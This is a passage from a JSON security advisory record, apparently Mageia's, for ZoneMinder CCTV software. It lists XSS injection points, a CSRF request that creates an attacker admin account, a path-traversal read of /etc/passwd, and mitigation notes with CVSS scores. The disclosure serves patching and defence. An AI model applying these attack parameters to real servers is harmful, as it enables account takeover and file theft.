view=console[XSS] view=groups[XSS] view=events&filter[terms][1][cnj]=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=[XSS]and view=events&limit=1%22%3E%3C/a%3E[XSS] (among others). 
(CVE-2017-5367) ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, is vulnerable to CSRF (Cross Site Request Forgery) which allows a remote attacker to make changes to the web application as the currently logged-in victim. If the victim visits a malicious web page, the attacker can silently and automatically create a new admin user within the web application for remote persistence and further attacks. The URL is /zm/index.php and sample parameters could include action=user uid=0 newUser[Username]=attacker1 newUser[Password]=Password1234 conf_password=Password1234 newUser[System]=Edit (among others). (CVE-2017-5368) A file disclosure and inclusion vulnerability exists in web/views/file.php in ZoneMinder 1.x through v1.30.0 because of unfiltered user-input being passed to readfile(), which allows an authenticated attacker to read local system files (e.g., /etc/passwd) in the context of the web server user (www-data). The attack vector is a .. (dot dot) in the path parameter within a zm/index.php?view=file&path= request. (CVE-2017-5595) A Cross-Site Scripting (XSS) was discovered in ZoneMinder 1.30.2. The vulnerability exists due to insufficient filtration of user-supplied data (postLoginQuery) passed to the \"ZoneMinder-master/web/skins/classic/views/js/postlogin.js.php\" URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. (CVE-2017-7203) Notes for sysadmins: 1\\. CSRF attacks are now blocked by setting the ZoneMinder variable 'ENABLE_CSRF_MAGIC' to 'yes'. During system update you may want to check that this variable is set. In Mageia 'yes' is the default for new installs of ZoneMinder. 2\\. Changes have been made to /etc/httpd/conf/site.d/zoneminder.conf to mitigate CVE-2016-10140. Make sure to accept the new configuration when updating existing systems. 
\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-10T02:05:58", "type": "mageia", "title": "Updated zoneminder packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10140", "CVE-2016-10201", "CVE-2016-10202", "CVE-2016-10203", "CVE-2016-10204", "CVE-2016-10205", "CVE-2016-10206", "CVE-2017-5367", "CVE-2017-5368", "CVE-2017-5595", "CVE-2017-7203"], "modified": "2017-06-10T02:05:58", "id": "MGASA-2017-0162", "href": "https://advisories.mageia.org/MGASA-2017-0162.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}